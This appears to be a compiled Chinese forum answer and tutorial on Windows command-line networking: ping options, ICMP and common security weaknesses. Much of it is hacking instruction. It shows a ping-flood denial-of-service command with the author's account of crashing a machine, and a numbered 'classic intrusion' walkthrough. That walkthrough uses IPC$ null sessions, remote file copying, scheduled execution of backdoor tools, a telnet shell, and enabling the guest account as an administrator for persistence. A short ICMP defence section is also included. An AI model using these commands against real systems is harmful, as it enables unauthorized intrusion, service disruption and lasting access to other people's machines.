在默認情況下,一般都只發送四個數據包,通過這個命令可以自己定義發送的個數,對衡量網路速度很有幫助,比如我想測試發送50個數據包的返回的平均時間為多少,最快時間為多少,最慢時間為多少就可以通過以下獲知:
C:\>ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
從以上我就可以知道在給202.103.96.68發送50個數據包的過程當中,返回了48個,其中有兩個由於未知原因丟失,這48個數據包當中返回速度最快為40ms,最慢為51ms,平均速度為46ms。
-l size Send buffer size.
定義echo數據包大小。
在默認的情況下windows的ping發送的數據包大小為32byt,我們也可以自己定義它的大小,但有一個大小的限制,就是最大隻能發送65500byt,也許有人會問為什麼要限制到65500byt,因為Windows系列的系統都有一個安全漏洞(也許還包括其他系統)就是當向對方一次發送的數據包大於或等於65532時,對方就很有可能當機,所以微軟公司為了解決這一安全漏洞於是限制了ping的數據包大小。雖然微軟公司已經做了此限制,但這個參數配合其他參數以後危害依然非常強大,比如我們就可以通過配合-t參數來實現一個帶有攻擊性的命令:(以下介紹帶有危險性,僅用於試驗,請勿輕易施於別人機器上,否則後果自負)
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
………………
這樣它就會不停的向192.168.1.21計算機發送大小為65500byt的數據包,如果你只有一台計算機也許沒有什麼效果,但如果有很多計算機那麼就可以使對方完全癱瘓,我曾經就做過這樣的試驗,當我同時使用10台以上計算機ping一台Win2000Pro系統的計算機時,不到5分鍾對方的網路就已經完全癱瘓,網路嚴重堵塞,HTTP和FTP服務完全停止,由此可見威力非同小可。
-f Set Don't Fragment flag in packet.
在數據包中發送「不要分段」標志。
在一般你所發送的數據包都會通過路由分段再發送給對方,加上此參數以後路由就不會再分段處理。
-i TTL Time To Live.
指定TTL值在對方的系統里停留的時間。
此參數同樣是幫助你檢查網路運轉情況的。

-v TOS Type Of Service.
將「服務類型」欄位設置為 tos 指定的值。
-r count Record route for count hops.
在「記錄路由」欄位中記錄傳出和返回數據包的路由。
在一般情況下你發送的數據包是通過一個個路由才到達對方的,但到底是經過了哪些路由呢?通過此參數就可以設定你想探測經過的路由的個數,不過限制在了9個,也就是說你只能跟蹤到9個路由,如果想探測更多,可以通過其他命令實現,我將在以後的文章中給大家講解。以下為示例:
C:\>ping -n 1 -r 9 202.96.105.101 (發送一個數據包,最多記錄9個路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
從上面我就可以知道從我的計算機到202.96.105.101一共通過了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97這幾個路由。

-s count Timestamp for count hops.
指定 count 指定的躍點數的時間戳。
此參數和-r差不多,只是這個參數不記錄數據包返回所經過的路由,最多也只記錄4個。

-j host-list Loose source route along host-list.
利用 computer-list 指定的計算機列表路由數據包。連續計算機可以被中間網關分隔(路由稀疏源)IP 允許的最大數量為 9。

-k host-list Strict source route along host-list.
利用 computer-list 指定的計算機列表路由數據包。連續計算機不能被中間網關分隔(路由嚴格源)IP 允許的最大數量為 9。

-w timeout Timeout in milliseconds to wait for each reply.
指定超時間隔,單位為毫秒。
此參數沒有什麼其他技巧。
ping命令的其他技巧:在一般情況下還可以通過ping對方讓對方返回給你的TTL值大小,粗略的判斷目標主機的系統類型是Windows系列還是UNIX/Linux系列,一般情況下Windows系列的系統返回的TTL值在100-130之間,而UNIX/Linux系列的系統返回的TTL值在240-255之間,當然TTL的值在對方的主機里是可以修改的,Windows系列的系統可以通過修改注冊表以下鍵值實現:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20
好了,ping命令的高級參數用法基本上被我COPY過來了,有什麼疑問歡迎提出,大家一起探討。

網間控制報文協議

ICMP是「Internet Control Message Protocol」(Internet控制消息協議)的縮寫。它是TCP/IP協議族的一個子協議,用於在IP主機、路由器之間傳遞控制消息。控制消息是指網路通不通、主機是否可達、路由是否可用等網路本身的消息。這些控制消息雖然並不傳輸用戶數據,但是對於用戶數據的傳遞起著重要的作用。
我們在網路中經常會使用到ICMP協議,只不過我們覺察不到而已。比如我們經常使用的用於檢查網路通不通的Ping命令,這個「Ping」的過程實際上就是ICMP協議工作的過程。還有其他的網路命令如跟蹤路由的Tracert命令也是基於ICMP協議的。

ICMP的重要性

ICMP協議對於網路安全具有極其重要的意義。ICMP協議本身的特點決定了它非常容易被用於攻擊網路上的路由器和主機.

比如,可以利用操作系統規定的ICMP數據包最大尺寸不超過64KB這一規定,向主機發起「Ping of Death」(死亡之Ping)攻擊。「Ping of Death」 攻擊的原理是:如果ICMP數據包的尺寸超過64KB上限時,主機就會出現內存分配錯誤,導致TCP/IP堆棧崩潰,致使主機死機。

此外,向目標主機長時間、連續、大量地發送ICMP數據包,也會最終使系統癱瘓。大量的ICMP數據包會形成「ICMP風暴」,使得目標主機耗費大量的CPU資源處理,疲於奔命。

應對ICMP攻擊

雖然ICMP協議給黑客以可乘之機,但是ICMP攻擊也並非無葯可醫。只要在日常網路管理中未雨綢繆,提前做好准備,就可以有效地避免ICMP攻擊造成的損失。

對於「Ping of Death」攻擊,可以採取兩種方法進行防範:第一種方法是在路由器上對ICMP數據包進行帶寬限制,將ICMP佔用的帶寬控制在一定的范圍內,這樣即使有ICMP攻擊,它所佔用的帶寬也是非常有限的,對整個網路的影響非常少;第二種方法就是在主機上設置ICMP數據包的處理規則,最好是設定拒絕所有的ICMP數據包。

設置ICMP數據包處理規則的方法也有兩種,一種是在操作系統上設置包過濾,另一種是在主機上安裝防火牆。
參考資料:http://..com/question/2506704.html

❼ ICMP是什麼ping有是什麼

ICMP是Internet控制報文協議。它是TCP/IP協議族的一個子協議,用於在IP主機、路由器之間傳遞控制消息。

ping是DOS命令,通常用於檢測網路連接和故障。Ping是Internet包資源管理器,用於測試網路連接量的程序。Ping向目的地發送ICMP回聲清除消息,並報告是否接收到所需的ICMP回聲響應。

(7)網路安全最厲害的命令擴展閱讀

控制消息是指網路通不通、主機是否可達、路由是否可用等網路本身的消息。這些控制消息雖然並不傳輸用戶數據,但是對於用戶數據的傳遞起著重要的作用。

ICMP協議是一種面向無連接的協議,用於傳輸出錯報告控制信息。它是一個非常重要的協議,它對於網路安全具有極其重要的意義。

它是TCP/IP協議族的一個子協議,屬於網路層協議,主要用於在主機與路由器之間傳遞控制信息,包括報告錯誤、交換受限控制和狀態信息等。

當遇到IP數據無法訪問目標、IP路由器無法按當前的傳輸速率轉發數據包等情況時,會自動發送ICMP消息。ICMP報文在IP幀結構的首部協議類型欄位(Protocol 8bit)的值=1。

❽ 網路安全問題有哪些

(1)操作系統沒有進行相關的安全配置

不管使用的是哪一種操作系統,安裝不完全的情況下都會存在一些安全問題,只有專門針對操作系統安全性進行相關的和嚴格的安全配置,才能達到一定的安全程度。千萬不要以為操作系統預設安裝後,只要自己設置的密碼很強就沒有問題。網路軟體的漏洞和「後門」是進行網路攻擊的首選目標。

(2)沒有進行CGI程序代碼審計

如果是通用的CGI問題,防範起來還稍微容易一些,但是對於網站或軟體供應商專門開發的一些CGI程序,很多存在嚴重的CGI問題,對於電子商務站點來說,會出現惡意攻擊者冒用他人賬號進行網上購物等嚴重後果。

(3)拒絕服務(DoS,DenialofService)攻擊

現在的網站對於實時性的要求是越來越高,DoS或DDoS對網站的威脅越來越大。如果一個網路攻擊是以網路癱瘓為目標的,那麼它的襲擊效果是很強烈的,破壞性很大,造成危害的速度和范圍也是我們預料不到的,而襲擊者本身的風險卻非常小,甚至可以在襲擊開始前就已經消失得無影無蹤。

(4)安全產品使用不當

雖然很多網站都採用了基本的網路安全設備,但由於安全產品本身的問題或使用問題,這些產品並沒有發揮到應有的作用。很多安全廠商的產品對配置人員的技術要求很高,就算是廠家在最初給用戶做了正確的安裝、配置,但一旦系統改動,需要改動相關安全產品的設置時,很容易產生許多安全問題。

(5)缺少嚴格的網路安全管理制度

網路安全最重要的還是要有相應的制度去保障,建立和實施嚴密的計算機網路安全制度與策略是真正實現網路安全的基礎。

❾ 跪求cmd黑客攻擊指令和cmd電腦命令!懸賞大大滴有

一 相關命令
建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
提示:對於不熟悉命令行操作的朋友來說.建立ipc$連接後,可以在"我的電腦"或"網上鄰居"右鍵映射網路驅動器,效果一樣.
二 經典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機).
ipc$經典入侵步驟:
1、net use \\ip\ipc$ 密碼 /user:用戶名
2、 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 時間 命令
5、入侵成功,連接你的肉雞
常用的網路命令
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組
net user 用戶名 /delete 刪除用戶
net user 用戶名 查看用戶的基本情況
net user 用戶名 /active:no 禁用該用戶
net user 用戶名 /active:yes 啟用該用戶
net share 查看計算機IPC$共享資源
net share 共享名 查看該共享的情況
net share 共享名=路徑 設置共享。例如 net share c$=c:
net share 共享名 /delete 刪除IPC$共享
net stop lanmanserver 關閉ipc$和默認共享依賴的服務
net use 查看IPC$連接情況
net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接
net use \\ip\ipc$ /del 刪除一個連接
net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤
net use z: /del
net time \\ip 查看遠程計算機上的時間
路徑:\文件名 \\ip\共享名復制文件到已經ipc$連接的計算機上
net view ip 查看計算機上的共享資源
at 查看自己計算機上的計劃作業
at \\ip 查看遠程計算機上的計劃作業
at \\ip 時間 命令(注意加盤符) 在遠程計算機上加一個作業
at \\ip 計劃作業ID /delete 刪除遠程計算機上的一個計劃作業
at \\ip all /delete 刪除遠程計算機上的全部計劃作業
at \\ip time "echo 5 > c:\t.txt" 在遠程計算機上建立文本文件t.txt;

下面純手打,上面是度娘給的

taskkill /im 進程名 停止運行
tasklisy 查看運行進程
ipconfig 查看本機IP
md 創建文件夾
rd 刪除文件夾
echo off > .txt|exit 添加文本
echo 內容 >> .txt 給文本添加內容
復制文件
net user 用戶名 密碼/add 創建一個普通賬號
net localgroup administrators 用戶名 /add 把賬戶加入超級用戶組